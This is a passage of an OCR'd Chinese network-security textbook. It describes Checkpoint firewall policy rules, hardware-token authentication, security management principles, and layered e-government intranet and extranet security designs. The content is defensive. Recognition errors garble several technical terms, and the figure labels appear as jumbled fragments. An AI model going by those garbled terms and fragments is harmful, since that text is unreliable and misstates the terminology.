(1) Checkpoint Firewall-1/VPN-1 配置 五 块 网 卡 , 安 装 于 网 络 的 出 口 网 关 位 置 , 物 理 连 
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接 方式 如 图 13-2 所 示 ,分 别 连 接 外 网 路 由 器 、 内 网 中 心 交 换 机 .DMZ 区 交换 机 、 服 务 器 网 段 
交换 机 和 拨号 路 由 器 。 

(2) 配置 Checkpoint Firewall-1 防火 墙 网 络 安全 访问 策略 如 下 。 

@ 把 Web 服务 器 、 防 病毒 服务 器 、Ftp 服务 器 、Mail 服务 器 及 DNS 服务 器 允许 进行 维 
护 主 机 IP 地 址 .所 有 Internet 访问 用 户 分 别 定义 为 网 络 安全 对 象 。 

@ 定义 SAP AAA 服务 器 对 象 ,指定 用 户 认证 方式 为 AAA 服务 器 的 Radius 方式 。 

@ 定义 防止 IP 地 址 欺骗 的 规则 ,凡是 源 地 址 为 DMZ 区 域 和 内 网 区 域 的 数据 包 都 不 允 
许 通过 防火 墙 进 入 。 

@ 定义 安全 策略 ,允许 外 部 连接 可 以 到 达 DMZ 指定 服务 器 的 服务 端口 。 

@ 定义 安全 策略 ,对 从 内 部 网 络 通过 防火 墙 向 外 发 送 的 数据 包 进 行 网 络 地 址 转换 , 完 
全 对 外 隔离 内 部 网 络 。 

@ 定义 安全 规则 ,允许 指定 的 应 用 数据 包 通 过 防火 墙 。 

@ 定义 安全 规则 ,强制 执行 对 URL 的 过 滤 。 

定义 安全 规则 ,强制 对 http 应 用 的 Java Applet、ActiveX 及 Java Scripts 进行 内 容 安 
全 检测 。 

@ 定义 安全 规则 ,强制 对 Ftp 应 用 的 数据 传输 进行 内 容 安全 检测 。 

@ 定义 安全 规则 ,强制 对 SMTP 应 用 的 附件 进行 内 容 安全 检测 。 

加 定义 安全 规则 , 设 定 对 流量 和 带宽 控制 的 规则 ,保证 对 专 有 服务 和 专 有 人 员 的 流量 
保证 。 

四 定义 安全 规则 ,其 他 的 任何 包 都 不 允许 通过 防火 墙 。 

(3) 在 军事 化 区 安装 Secure World 的 AAA 认证 服务 器 ,并 导入 全 部 令 牌 设备 。 

(4) 将 终端 认证 的 硬件 令 牌 分 发 给 允许 使 用 VPN .远程 拨号 访问 的 各 地 分 支 机 构 和 远 
程 拨号 用 户 。 

(5) 在 VPN 设备 及 拨号 访问 接 入 路 由 器 中 开启 AAA 认证 ,并 将 认证 服务 器 指向 到 
SPA 内 置 的 Radius 服务 器 。 

(6) 在 服务 器 端 配置 相关 的 用 户 自 注册 组 ,允许 相关 用 户 自 行进 行 身份 注册 。 

(7) 为 本 地 核心 网 络 设 备 配 置 使 用 SPA 进行 身份 认证 。 

(8) 为 系统 管理 员 分 配 硬 件 令 牌 并 用 其 访问 网 络 设备 。 

(9) 逐步 实施 主机 系统 和 基于 Windows 2003 域 的 令 牌 身份 认证 。 

(10) 逐步 实施 Web 业务 应 用 系统 及 办 公 自 动 化 系统 的 身份 认证 。 

4. 内 部 网 络 安全 管理 制度 制定 


面 对 网 络 安全 的 脆弱 性 , 除 在 网 络 设计 上 增加 安全 服务 功能 ,完善 系统 的 安全 保密 措施 
外 ,还 必须 花 大 力气 加 强 网 络 的 安全 管理 。 因 为 诸多 不 安全 因素 恰恰 反映 在 组 织 管理 和 人 
员 录 用 等 方面 ,而 这 又 是 计算 机 网 络 安全 所 必须 考虑 的 基本 问题 ,所 以 应 引起 各 级 部 门 领导 
的 重视 。 下 面 是 提出 的 有 关 信息 系统 安全 管理 的 若干 原则 和 实施 措施 以 供 参考 。 

(1) 安全 管理 原则 。 计 算 机 信息 系统 的 安全 管理 主要 基于 以 下 3 个 原则 。 

@ 多 人 负责 原则 。 每 项 与 安全 有 关 的 活动 都 必须 有 两 人 或 多 人 在 场 。 这 些 人 应 是 系 
统 主管 领导 指派 的 ,应 忠诚 可 靠 ,能 胜任 此 项 工作 。 

@ 任期 有 限 原则 。 一 般 来 讲 ,任何 人 最 好 不 要 长 期 担任 与 安全 有 关 的 职务 ,以 免 误 认 
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为 这 个 职务 是 专 有 的 或 永久 性 的 。 

@ 职责 分 离 原则 。 除 非 系统 主管 领导 批准 ,在 信息 处 理 系统 工作 的 人 员 不 要 打听 、 了 
解 或 参与 职责 以 外 与 安全 有 关 的 任何 事情 。 

(2) 安全 管理 的 实现 。 信 息 系统 的 安全 管理 部 门 应 根据 管理 原则 和 该 系统 处 理 数 据 的 
保密 性 ,制定 相应 的 管理 制度 或 采用 相应 规范 ,其 具体 工作 如 下 。 

吕 确定 该 系统 的 安全 等 级 。 

根据 确定 的 安全 等 级 ,确定 安全 管理 的 范围 。 制 定 相 应 的 机 房 出 入 管理 制度 。 对 安全 
等 级 要 求 较 高 的 系统 ,要 实行 分 区 控制 ,限制 工作 人 员 出 入 与 己 无 关 的 区 域 。 制 定 严 格 的 操 
作 规 程 。 操 作 规程 要 根据 职责 分 离 和 多 人 负责 的 原则 ,各 负 其 责 , 不 能 超越 自己 的 管辖 范 
半 。 制 定 完 备 的 系统 维护 制度 。 维 护 时 ,首先 要 经 主管 部 门 批准 ,并 有 安全 管理 人 员 在 场 ， 
故障 原因 、 维 护 内 容 和 维护 前 后 的 情况 要 详细 记录 。 制 定 应 急 措 施 。 要 制定 在 紧急 情况 下 ， 
系统 如 何 尽 快 恢复 的 应 急 措施 ,使 损失 减 至 最 小 。 建 立 人 员 雇 用 和 解聘 制度 ,对 工作 调动 和 
离职 人 员 要 及 时 调整 相应 的 授权 。 

@ 网 络 安全 管理 制度 。 

网 络 安全 管理 的 基本 原则 包括 分 离 与 制约 原则 、 内 部 人 员 与 外 部 人 员 分 离 .用 户 与 开发 
人 员 分 离 .用 户 机 与 开发 机 分 离 、 权 限 分 级 管理 .有限 授 权 原 则 、 预 防 为 主 原则 和 可 审计 
原则 。 

安全 管理 制度 的 主要 内 容 包 括 机 构 与 人 员 安 全 管理 .系统 运行 环境 安全 管理 、 硬 设施 安 
全 管理 、 软 设施 安全 管理 网 络 安全 管理 ,数据 安全 管理 .技术 文档 安全 管理 .应 用 系统 运营 
安全 管理 ,操作 安全 管理 和 应 用 系统 开发 安全 管理 。 


13.5 电子 政务 安全 平台 实施 方案 


13.5.1 电子 政务 平台 


电子 政务 是 经 济 与 社会 信息 化 的 先决 条 件 。 一 个 国家 的 信息 化 需要 来 自 多 方面 力量 的 
推进 ,其 中 ,政府 作为 国家 组 成 及 信息 流 的 “中 心 节点 ”, 在 社会 信息 化 的 进程 中 起 着 责 无 旁 
贷 而 又 无 可 替代 的 作用 。 

电子 政务 的 建设 内 容 表 现 为 以 政务 信息 资源 的 开发 和 管理 为 切入 点 ,通过 集成 和 应 用 
现代 信息 技术 ,以 增强 政府 的 调控 能 力 、 改 进 决策 质量 、 降 低 行政 成 本 ,改善 工作 效率 和 提高 
廉洁 程度 为 重点 ,优化 政府 的 组 织 结构 、 业 务 流程 和 工作 方式 ,以 直接 、 非 接触 和 虚拟 的 方 
式 , 向 社会 提供 全 方位 与 跨 部 门 、 超 越 时 间 与 空间 ,行为 规范 与 透明 、 符 合法 律 与 国际 惯例 要 
求 的 管理 和 服务 。 

电子 政务 平台 是 一 个 高 质量 ,高 效率 、 智 能 化 的 办 公 系 统 , 该 平台 以 数据 库 为 基础 ,利用 
了 文件 传输 .电子 邮件 ,. 短 消息 等 现代 数字 通信 与 Internet 技术 。 随 着 网 络 的 发 展 与 普及 ， 
政府 部 门 也 由 局 域 网 扩充 到 广域网 。 互 联网 的 开放 性 会 使 政府 网 络 受 到 来 自 外 部 互联 网 的 
安全 威胁 、 内 部 网 络 与 外 部 网 络 互联 的 安全 威胁 和 内 部 网 络 的 安全 威胁 。 

2002 年 7 月 ,国家 信息 化 领导 小 组 颁布 的 (国家 信息 化 领导 小 组 关于 我 国电 子 政务 建 
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设 指导 意见 }》 中 规定 : 电子 政务 网 络 由 政务 内 网 和 政务 外 网 构成 ,两 网 之 间 物 理 隔离 ,政务 
外 网 与 互联 网 之 间 逻 辑 隔离 。 原 则 要 求 为 ,统一 标准 ,保障 安全 。 正 确 处 理 安全 与 发 展 的 关 
系 , 综 合 平衡 成 本 和 效益 ,一 手 抓 电子 政务 ,一 手 抓 网 络 与 信息 安全 ,制定 并 完善 电子 政务 信 
息 安全 保障 体系 。 主 要 任务 为 ,基本 建立 电子 政务 网 络 与 信息 安全 保障 体系 。 要 组 织 建立 
我 国电 子 政务 网 络 与 信息 安全 保障 体系 框架 ,逐步 完善 安全 管理 制度 ,建立 电子 政务 信任 体 
系 , 加 强 关键 性 安全 技术 产品 的 研究 和 开发 ,建立 应 急 支 援 中 心 和 数据 灾难 备份 基础 设施 。 
中 共 中 央 办 公 厅 、 国 务 院 办 公 厅 关于 转发 (国家 信息 化 领导 小 组 关于 加 强 信 息 安 全 保障 工作 
的 意见 》 的 通知 (中 办 发 [2003]27 号 ) 提 出 了 积极 防御 、 综 合 防范 的 战略 方针 ,提出 了 实行 信 
息 安 全 等 级 保护 的 重要 思想 ,指出 信息 化 发 展 的 不 同 阶段 和 不 同 的 信息 系统 有 着 不 同 的 安 
全 需求 ,必须 从 实际 出 发 ,综合 平衡 安全 成 本 和 风险 ,优化 信息 安全 资源 的 配置 ,确保 重点 。 
要 抓紧 建立 信息 安全 等 级 保护 制度 ,制定 信息 安全 等 级 保护 的 管理 办 法 和 技术 指南 。 要 重 
视 信息 安全 风险 评估 工作 。 公 安 部 .国家 保密 局 国家 密码 管理 委员 会 办 公 室 、 国 务 院 信 息 
化 工作 办 公 室 文件 一 一 关于 印发 (关于 信息 安全 等 级 保护 工作 的 实施 意见 的 通知 ( 公 通 字 
[2004]66 号 ) 对 开展 等 级 保护 工作 的 意义 、 信 息 安 全 等 级 保护 制度 的 原则 、 信 息 安 全 等 级 保 
护 工作 的 基本 内 容 、 信 息 安全 等 级 保护 工作 要 求 的 阐述 ,是 目前 等 级 保护 工作 最 具体 的 指导 


13.5.2 电子 政务 安全 平台 解决 方案 


按照 4 国家 电子 政务 标准 化 指南 》 相 关 要 求 ,三 级 以 上 网 络 属于 涉 密 网 络 ,网 络 需要 分 为 
政务 涉 密 网 ,政务 内 网 ,政务 外 网 ,各 网 络 之 间 通 过 安全 设备 进行 隔离 。 本 书 仅 对 政务 内 网 
和 政务 外 网 的 规划 与 设计 方案 进行 阐述 。 

1. 电子 政务 网 络 结构 

政务 内 网 主要 面向 政府 部 门 实现 政府 部 门 内 部 的 业务 处 理 , 如 政府 部 门 之 间 的 公文 流 
转 、 公 文 交换 、 公 文 处 理 、 办 公 管 理 、 项 目 管理 .项 目 审批 .群众 来 信 的 处 理 与 回复 等 。 这 类 应 
用 处 理 的 信息 大 部 分 不 宜 对 外 公开 ,属于 敏感 信息 ,安全 的 重点 主要 包括 对 政务 人 员 的 身份 
认证 ,政务 资源 的 授权 访问 和 信息 安全 传输 等 方面 。 

政务 外 网 主要 面向 社会 向 公众 提供 政策 咨询 、 信 息 查 询 ,政务 数据 上 报 等 公众 服务 。 公 
众 服 务 的 对 象 比较 广泛 ,可 以 是 企业 管理 人 员 .普通 群众 。 这 类 应 用 处 理 的 前 台 信息 一 般 不 
涉及 工作 秘密 ,可 以 对 外 开放 ,但 它 涉及 政府 在 公众 的 服务 形象 ,要 保证 该 类 应 用 的 可 靠 性 、 
可 用 性 ,同时 ,应 保证 应 用 中 发 布 信息 的 真实 与 可 信 , 安 全 防护 的 重点 应 放 在 系统 的 可 靠 性 、 
信息 的 可 信 性 等 方面 。 电 子 政务 网 络 结构 示意 图 如 图 13-3 所 示 。 

2. 电子 政务 设计 原则 

(1) 综合 防范 ,适度 安全 。 在 三 级 信息 系统 网 络 建设 时 ,必须 充分 考虑 来 自 网 络 的 各 种 
威胁 ,采取 适当 的 安全 措施 ,进行 综合 防范 。 同 时 ,以 应 用 为 主导 ,充分 分 析 应 用 系统 的 功 
能 ,在 保证 有 效应 用 的 前 提 下 ,安全 保密 建设 经 济 适用 、 适 度 安全 、 易 于 使 用 、 易 于 实施 。 

(2) 分 域 防 控 、 分 类 防护 。 贯 彻 等 级 保护 思想 ,针对 不 同 的 安全 域 采用 不 同 的 安全 防护 
策略 ,通过 制定 安全 策略 ,实施 分 区 边界 防护 和 区 间 访 问 控制 ,保证 信息 的 安全 隔离 和 安全 
交换 
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图 13-3 电子 政务 网 络 结构 示意 图 


(3) 谁 主管 谁 负责 。 基 于 等 级 保护 的 电子 政务 网 络 建设 过 程 中 ,部 门 网 络 的 内 部 安全 
问题 应 根据 本 单位 的 安全 需求 和 实际 情况 ,依据 国家 相关 政策 自行 开展 信息 安全 建设 。 

(4) 安全 保密 一 体 化 。 在 电子 政务 安全 保密 建设 中 ,无 论 是 技术 的 采用 ,还 是 设备 的 选 
配 ,必须 坚持 安全 保密 一 体 化 的 原则 ,这样 建 设 的 系统 才 最 为 有 效 、 最 为 经 ; 

3. 电子 政务 内 网 建设 方案 

(1) 政务 内 网 系统 构成 。 对 于 电子 政务 内 网 ,政务 专 网 ,专线 `VPN 是 构建 电子 政务 网 
络 的 基础 设施 。 安 全 政务 网 络 平台 是 依托 专 网 、 专 线 、VPN 设备 将 各 接 人 单位 安全 互联 起 
来 的 电子 政务 内 网 ; 安全 支撑 平台 为 电子 政务 内 网 信息 系统 提供 安全 互联 、 接 入 控制 统一 
身份 认证 ,授权 管理 恶意 代码 防范 、 入 侵 检 于 一 一 一 一 一 一 一 一 一 一 一 一 一 一 


测 、 安 全 审计 、 桌 面 安全 防护 等 安全 支撑 ; 电 电子 政务 内 网 应 用 

子 政务 专 网 应 用 既是 安全 保障 平台 的 保护 对 “| 安全 | 。 内 部 共享 信息 、 内 部 受 控 信息 | 管理 
象 ,又 是 电子 政务 内 网 实施 电子 政务 的 主体 ， 制度 
它 主 要 内 部 共享 信息 、 内 部 受 控 信 息 等 ,这 两 办 公平 台 信息 共享 平台 

类 信息 运行 于 电子 政务 办 公平 台 和 电子 政务 政务 内 网 网 络 平台 

信息 共享 平台 之 上 ; 电子 政务 管理 制度 体系 pt 

是 电子 政务 长 期 有 效 运 行 的 保证 。 电 子 政务 

内 网 系统 构成 如 图 13-4 所 示 。 图 13-4 ”电子 政务 内 网 系统 构成 


政务 内 网 网 络 平台 : 电子 政务 内 网 建设 
是 依托 电子 政务 专 网 专线、VPN 构造 的 电子 政务 内 网 网 络 。 
电子 政务 内 网 应 用 : 在 安全 支撑 平台 的 作用 下 ,基于 安全 电子 政务 内 网 网 络 了 


Bs: 
芭 


,可 以 
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打造 安全 电子 政务 办 公平 台 、 安 全 政务 信息 共享 平台 。 

安全 支撑 平台 : 安全 支撑 平台 由 安全 系统 组 成 ,是 电子 政务 内 网 信息 系统 运行 的 安全 
保障 。 

(2) 建议 拓扑 图 。 电 子 政务 内 网 按照 等 级 保护 标准 要 求 ,进行 安全 域 的 划分 。 根 据 不 
同 的 划分 原则 ,大 致 可 以 分 为 网 络 基础 架构 区 、 安 全 管理 区 、 数 据 处 理 区 、 边 界 防御 区 、 办 公 
区 、 会 议 区 等 安全 子 区 域 , 在 实际 的 网 络 设计 中 ,可 以 根据 相关 标准 ,按照 实际 需要 进一步 细 


分 ,如 图 13-5 所 示 。 
三 级 政务 内 网 建议 拓扑 图 


系统 补丁 “日 志 服 务 全 局 安全 认证 系统 
服务 器 ”器 等 ”管理 系统 EE EE 


防火 墙 


漏洞 扫描 


网 络 基础 架构 区 


图 13-5 三 级 政务 内 网 建议 拓扑 图 


划分 安全 域 的 目标 是 针对 不 同 的 安全 域 采 用 不 同 的 安全 防护 策略 , 既 保 证 信息 的 安全 
访问 ,又 兼顾 信息 的 开放 性 。 按 照应 用 系统 等 级 、 数 据 流 相似 程度 、 硬 件 和 软件 环境 的 可 共 
用 程度 、 安 全 需求 相似 程度 ,并 且 从 方便 实施 的 角度 ,将 整个 电子 政务 业务 系统 分 为 不 同 的 
安全 子 域 区 ,便于 由 小 到 大 、 由 简 到 繁 进行 网 络 设计 。 安 全 域 的 划分 有 利于 对 电子 政务 系统 
实施 分 区 安全 防护 , 即 分 域 防 控 。 

(3) 安全 支撑 平台 的 系统 结构 。 电 子 政务 安全 支撑 平台 是 电子 政务 系统 运行 的 安全 保 
障 ,由 网 络 设备 、 安 全 设备 、 安 全 技术 构成 。 电 子 政务 安全 支撑 平台 依托 电子 政务 配套 的 安 
全 设备 ,通过 分 级 安全 服务 和 分 域 安全 管理 ,实现 等 级 保护 中 要 求 的 物理 安全 、 网 络 安全 、 主 
机 安全 、 应 用 安全 、 数 据 安全 及 备份 恢复 .从 而 保证 整个 电子 政务 信息 系统 安全 ,最 终 形成 安 
全 开放 统一 、 分 级 分 域 防护 的 安全 体系 。 电子 政务 安全 支撑 平台 的 系统 结构 如 图 13-6 
所 示 。 
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电子 政务 应 用 
数据 安全 及 备份 恢复 
电子 政务 应 用 安 应 用 安全 安 
全 主机 安全 全 
电子 政务 管 服 
安全 支撑 平台 理 网 络 安全 务 
理 安全 
网 络 人 
电子 政务 安全 基础 设施 
网 络 


图 13-6 电子 政务 安全 支撑 平台 的 系统 结构 


(4) 安全 支撑 平台 的 系统 配置 。 

@ 核心 交换 机 双 归 属 。 两 台 核心 交换 机 通过 VRRP 协议 连接 , 互 为 元 余 , 保 证 主要 网 
络 设备 的 业务 处 理 能 力 具 备 元 余 空间 ,满足 业务 高 峰 期 需要 。 

@ 认证 及 地 址 管理 系统 (DCBI)。DCBI 可 以 完成 基于 主机 的 统一 身份 认证 和 全 局 地 
址 管理 功能 。 

a, 基于 主机 的 统一 身份 认证 。 终 端 系统 通过 安装 802. 1X 认证 客户 端 ,在 连接 到 内 网 
之 前 ,首先 需要 通过 DCBI 的 身份 认证 ,才能 打开 交换 机 端口 ,使 用 网 络 资源 。 

b. 全 局 地 址 管理 。 根 据 政务 网 地 址 规模 灵活 划分 地 址 池 ; 固定 用 户 地 址 下 发 与 永久 
绑 定 ; 漫游 用 户 地 址 下 发 与 临时 绑 定 .自动 回收 ; 接 入 交换 机 端口 安全 策略 自动 绑 定 ; 客户 
端 地 址 获取 方式 无 关 性 。 

@ 全 局 安全 管理 系统 (DCSM)。DCSM 是 政务 内 网 所 有 端 系统 的 管理 与 控制 中 心 , 兼 
具 用 户 管理 .安全 认证 .安全 状态 评估 、 安 全 联动 控制 及 安全 事件 审计 等 功能 。 

a. 安全 认证 。 安 全 认证 系统 定义 了 对 用 户 终端 进行 准 入 控制 的 一 系列 策略 ,包括 用 户 
终端 安全 状态 认证 、 补 丁 检查 项 配置 .安全 策略 配置 .终端 修复 配置 及 对 终端 用 户 的 隔离 方 
式 配置 等 。 

b. 用 户 管理 。 不 同 的 用 户 、 不 同类 型 的 接 入 终端 可 能 要 求 不 同 级 别 的 安全 检查 和 控 
制 。 安 全 策略 服务 器 可 以 为 不 同 用 户 提供 基于 身份 的 个 性 化 安全 配置 和 网 络 服务 等 级 , 方 
便 管 理 员 对 网 络 用 户 制 定 差异 化 的 安全 策略 。 

c. 安全 联动 控制 。 安 全 策略 服务 器 负责 评估 安全 客户 端 上 报 的 安全 状态 ,控制 安全 联 
动 设备 对 用 户 的 隔离 与 开放 ,下 发 用 户 终端 的 修复 方式 与 安全 策略 。 通 过 安全 策略 服务 器 
的 控制 ,安全 客户 端 ,安全 联动 设备 与 防 病毒 服务 器 才 可 以 协同 工作 ,配合 完成 端 到 端的 安 
全 准 和 控制。 

d. 日 志 审计 。 安 全 策略 服务 器 收集 由 安全 客户 端 上 报 的 安全 事件 ,并 形成 安全 日 志 ， 
可 以 为 管理 员 追 踪 和 监控 整个 网 络 的 安全 状态 提供 依据 。 

其 中 ,安全 管理 系统 代理 ,可 以 对 用 户 终 端 进行 身份 认证 、 安 全 状态 评估 及 安全 策略 实 
施 的 主体 ,其 主要 功能 如 下 。 

。 提供 802. 1x、portal 等 多 种 认证 方式 ,可 以 与 交换 机 、 路 由 器 配合 实现 接 人 层 、 汇 聚 

层 及 VPN 的 端点 准 入 控制 。 
。 主机 桌面 安全 防护 ,检查 用 户 终 端的 安全 状态 ,包括 操作 系统 版 本 、 系 统 补丁 等 信 
息 ; 同时 提供 与 防 病毒 客户 端 联动 的 接口 ,实现 与 第 三 方 防 病毒 客户 端的 联动 , 检 
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查 用 户 终 端的 防 病毒 软件 版 本 、 病 毒 库 版 本 及 病毒 查 杀 信息 。 这 些 信 息 将 被 传递 到 
认证 服务 器 ,执行 端点 准 入 的 判断 与 控制 。 
。 安全 策略 实施 ,接收 认证 服务 器 下 发 的 安全 策略 并 强制 用 户 终 端 执 行 ,包括 设置 安 
全 策略 (是 否 监控 邮件 ,注册 表 ) 、 系 统 修复 通知 与 实施 (自动 或 手工 升级 补丁 和 病毒 
库 ) 等 功能 。 不 按 要 求实 施 安 全 策略 的 用 户 终端 将 被 限制 在 隔离 区 。 
。 实时 监控 系统 安全 状态 ,包括 是 否 更 改 安全 设置 .是 否 发 现 新 病毒 等 ,并 将 安全 事件 
定时 上 报到 安全 策略 服务 器 ,用 于 事后 进行 安全 审计 。 
。 实时 监控 终端 用 户 的 行为 ,实现 用 户 上 网 行为 可 审计 。 
@ 边界 防火 墙 CDCFW)。 能 够 对 网 络 区 域 进行 分 割 ,对 不 同 区 域 之 间 的 流量 进行 控 
制 ,通过 对 数据 包 的 源 地 址 .目的 地 址 、 源 端口 .目的 端口 .网 络 协议 等 参数 进行 检查 ,把 可 能 
的 安全 风险 控制 在 相对 独立 的 区 域 中 ,避免 安全 风险 的 大 规模 扩散 。 
对 于 广域网 接 入 用 户 ,能 够 对 他 们 的 网 络 应 用 行为 进行 管理 ,包括 进行 身份 认证 、 对 访 
问 资源 的 限制 .对 网 络 访问 行为 进行 控制 等 。 
加 统一 威胁 管理 (UTM)。UTM 集合 了 防火 墙 、 防 病毒 网 关 、IPS/IDS 入 侵 防 御 、 防 垃 
圾 邮件 网 关 、VPN(IPSEC、PPTP、L2TP) 网 关 、 流 量 整形 网 关 、Anti-DoS 网 关 、 用 户 身 份 认 
证 网 关 、 审 计 网 关 、BT 控制 网 关 十 IM 控制 网 关 十 应 用 提升 网 关 ( 网 游 VoIP 流 媒 体 支持 )， 
十 二 大 功能 为 一 体 。 采 用 专门 设计 的 硬件 平台 和 专用 的 安全 操作 系统 ,采用 硬件 独立 总 线 
架构 并 采用 病毒 检测 专用 模块 ,在 提升 产品 功能 的 同时 保证 了 产品 在 各 种 环境 下 的 高 性 能 。 
完成 国家 标准 中 要 求 的 防 病毒 .恶意 代码 过 滤 等 边界 防护 功能 。 
@ 入 侵 检 测 系统 CDCNIDS ) 。 
和 人 侵 检测 系统 能 够 及 时 识别 并 阻止 外 部 入 侵 者 或 内 部 用 户 对 网 络 系统 的 非 授 权 使 用 、 
误 用 和 滥用 ,对 网 络 人 侵 事 件 实施 主动 防御 。 通 过 在 电子 政务 网 络 平台 上 部 署 和 人 侵 检 测 系 
统 , 可 提供 对 常见 人 侵 事件 .黑客 程序 .网 络 病毒 的 在 线 实 时 检测 和 告警 功能 ,能 够 防止 恶意 
入 侵 事 件 的 发 生 。 
a 漏洞 扫描 系统 。 
漏洞 扫描 系统 提供 网 络 系统 进行 风险 预测 、 风 险 量 化 、 风 险 趋 势 分 析 等 风险 管理 的 有 效 
工具 ,使 用 户 了 解 网 络 的 安全 配置 和 运行 的 应 用 服务 ,及 时 发 现 安全 漏洞 ,并 客观 评估 网 络 
风险 等 级 。 漏 洞 扫描 系统 能 够 发 现 所 维护 的 服务 器 的 各 种 端口 的 分 配 ,提供 的 服务 ,服务 软 
件 版 本 和 系统 存在 的 安全 漏洞 .并 为 用 户 提供 网 络 系统 弱点 /漏洞 /隐患 情况 报告 和 解决 方 
案 , 帮 助 用 户 实现 网 络 系统 统一 的 安全 策略 ,确保 网 络 系统 安全 有 效 地 运行 。 
流量 整形 设备 (DCFS) 。 
。 控制 各 种 应 用 的 带宽 ,保证 关键 应 用 ,抑制 不 希望 有 的 应 用 。 可 针对 不 同 的 源 IP( 组 ) 
和 时 间 段 ,在 所 分 配 的 带宽 管道 内 ,对 其 应 用 实现 不 同 的 流量 带宽 限制 或 是 禁止 使 用 。 
。 统计 ,监控 和 分 析 , 了 解 网 络 上 各 种 应 用 所 占 的 带宽 比例 ,为 网 络 的 用 途 和 规划 提供 
科学 依据 。 可 通过 设备 对 网 络 上 的 流量 数据 进行 监控 和 分 析 , 量 化 地 了 解 当 前 网 络 
中 各 种 应 用 流量 所 占 的 比例 ,以 及 各 应 用 的 流量 各 是 多 少 ,从 而 得 知 用 户 的 网 络 最 
主要 的 用 途 是 什么 等 。 
其 他 网 络 设备 。 
其 他 网 络 设备 可 以 参照 国标 对 应 的 (设备 安全 技术 要 求 ) 进 行 选 型 。 
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4. 电子 政务 外 网 建设 方案 

(1) 电子 政务 外 网 系统 构成 。 

电子 政务 外 网 基于 互联 网 ,主要 是 向 公众 提供 相关 行政 服务 ,发 布 政府 信息 。 它 的 安全 
支撑 平台 为 电子 政务 外 网 信息 系统 提供 安全 互联 、 接 入 控制 统一 身份 认证 ,授权 管理 ,恶意 
代码 防范 、 入 侵 检测 ,安全 审计 、 桌 面 安全 防护 等 安全 支撑 。 既 要 有 效 保障 互联 网 环境 下 的 
网 络 安全 ,又 要 解决 对 公众 的 开放 服务 ,使 安全 和 开放 在 互联 网 环境 下 达到 有 机 的 协调 统 
~。 电子 政务 外 网 系统 的 构成 如 图 13-7 所 示 。 


电子 政务 外 网 应 用 
安全 公共 服务 信息 管理 
支撑 制度 
F 台 公共 信息 服务 平台 | 体系 

政务 外 网 网 络 平台 

互联 网 


图 13-7 电子 政务 外 网 系统 的 构成 


(2) 建议 拓扑 图 。 
电子 政务 外 网 的 拓扑 结构 如 图 13-8 所 示 。 


三 级 政务 外 网 建议 拓扑 图 


系统 补丁 上 网 行为 “全 Web 服务 器 
服务 器 。 二 四 系 织 。 疙 时 -习习 


网 页 防 签 改 公共 服务 区 
DMZ 


ET 一 


Jnternet 


| 安全 管理 系统 代理 安全 管理 系统 代理 
ER 办 公 区 会 议 区 


图 13-8 三 级 电子 政务 外 网 的 拓扑 结构 
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(3) 安全 支撑 平台 的 系统 配置 。 

为 了 节省 篇 幅 , 对 于 政务 内 网 出 现 过 的 设备 ,如 果 功 能 没有 差异 ,在 此 部 分 将 不 再 说 明 。 

中 边界 防火 墙 (DCFW)。 不 同 于 内 网 ,外 网 的 边界 防火 墙 还 承担 NAT 功能 。 

@ 上 网 行为 日 志 系统 (DCBI-NetLog)。 实 现 用 户 上 网 行为 记录 功能 ,可 实现 记录 上 网 
者 访问 的 网 站 访问 的 URL、 源 /目的 IP 地址、 源 /目的 端口 、 上 网 时 间 及 流量 等 数据 ,从 而 
提供 了 上 网 行为 的 安全 审计 数据 源 ,并 实现 各 种 统计 功能 。 

@ 网 页 防 算 改 。 电 子 政务 外 网 信息 系统 中 大 多 数 应 用 是 以 Web 网 页 方式 存在 ,网 页 
防 自 改 系统 为 电子 政务 应 用 系统 提供 网 站 立即 恢复 的 手段 和 功能 。 网 页 防臭 改 系统 可 以 用 
于 阻 断 来 自 互 联网 对 电子 政务 应 用 系统 的 破坏 。 


本 章 小 结 


(1) 安全 体系 结构 理论 与 技术 主要 包括 安全 体系 模型 的 建立 及 其 形式 化 描述 与 分 析 ， 
安全 策略 和 机 制 的 研究 ,检验 和 评估 系统 安全 性 的 科学 方法 和 准则 的 建立 ,符合 这 些 模型 、 
策略 和 准则 的 系统 的 研制 (如 安全 操作 系统 、 安 全 数据 库 系统 等 ) 。 

(2) 网 络 安全 研究 内 容 包括 网 络 安全 整体 解决 方案 的 设计 与 分 析 , 以 及 网 络 安全 产品 
的 研发 等 。 目 前 ,在 市 场 上 比较 流行 的 安全 产品 有 防火 墙 、 安 全 路 由 器 .虚拟 专用 网 
(VPN) 、 安 全 服务 器 .PKI\ 用 户 认 证 产品 、 安 全 管理 中 心 、 人 侵 检测 系统 (IDS) ,安全 数据 库 、 
安全 操作 系统 等 。 

(3) 根据 网 络 系统 的 实际 安全 需求 ,结合 网 络 安全 体系 模型 ,一般 采用 防火 墙 \ 人 侵 检 
测 ,漏洞 扫描 、 防 病毒 .VPN 物理 隔离 等 网 络 安全 防护 措施 。 
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